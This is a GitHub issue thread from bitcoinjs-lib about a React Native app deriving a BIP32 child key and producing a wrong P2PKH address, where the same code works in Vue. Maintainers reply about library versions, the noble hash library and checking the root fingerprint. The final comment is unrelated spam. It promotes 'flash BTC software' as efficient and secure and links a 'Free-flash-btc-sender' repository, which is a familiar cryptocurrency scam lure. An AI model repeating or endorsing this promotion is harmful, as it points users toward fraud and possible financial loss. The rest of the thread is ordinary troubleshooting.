### ISSUE TITLE
reactnative generate address error

### ISSUE THREAD

**Issue by jiegege10** [bitcoinjs/bitcoinjs-lib#2085]
const seed = await bip39.mnemonicToSeed(mnemonic)
    const root = bip32.fromSeed(seed);
    const path = "m/44'/0'/0'/0/0"
    const child = root.derivePath(path)
    const bean = await payments.p2pkh({pubkey: child.publicKey})

The address generated in the vue project is correct and the same code.
I changed the encryption to crypto-browserify. The address signature is correct, but the last six digits are wrong. How should I solve this problem?

**Comment by junderw** [comment]
What version are you using?

If not the latest, try using the latest.

**Comment by jiegege10** [comment]
> 您使用什么版本？
> 
> 如果不是最新的，请尝试使用最新的。



> What version are you using?
> 
> If not the latest, try using the latest.

I'm using the latest version

**Comment by junderw** [comment]
crypto-browserify has nothing to do with address creation... we don't use it. We don't use the NodeJS crypto API for hashes. We use noble.

**Comment by junderw** [comment]
You are using v6.1.5?

**Comment by jiegege10** [comment]
> You are using v6.1.5?

yes,But in my vue project, the generated address is correct. But the address generated in Reactnative is wrong. The code is the same

**Comment by jasonandjay** [comment]
> > You are using v6.1.5?
> 
> yes,But in my vue project, the generated address is correct. But the address generated in Reactnative is wrong. The code is the same

@jiegege10 
What does "the last six digits are wrong" mean? Are you referring to the bean.address of P2PKH?
I suggest you print root.fingerprint to see if xpub is the same as expected in both environments

**Comment by regressivetassive** [comment]
I've been exploring different options for managing my BTC transactions and came across an interesting alternative: flash BTC software. I've found that using a reliable flash BTC software can provide a more efficient and secure way to handle transactions. If anyone is interested in learning more, look at that repository (https://github.com/CrypToprexofficial/Free-flash-btc-sender) that provides more information and resources on the topic. Please keep in mind that it's essential to do your own research and due diligence when exploring new tools and methods.
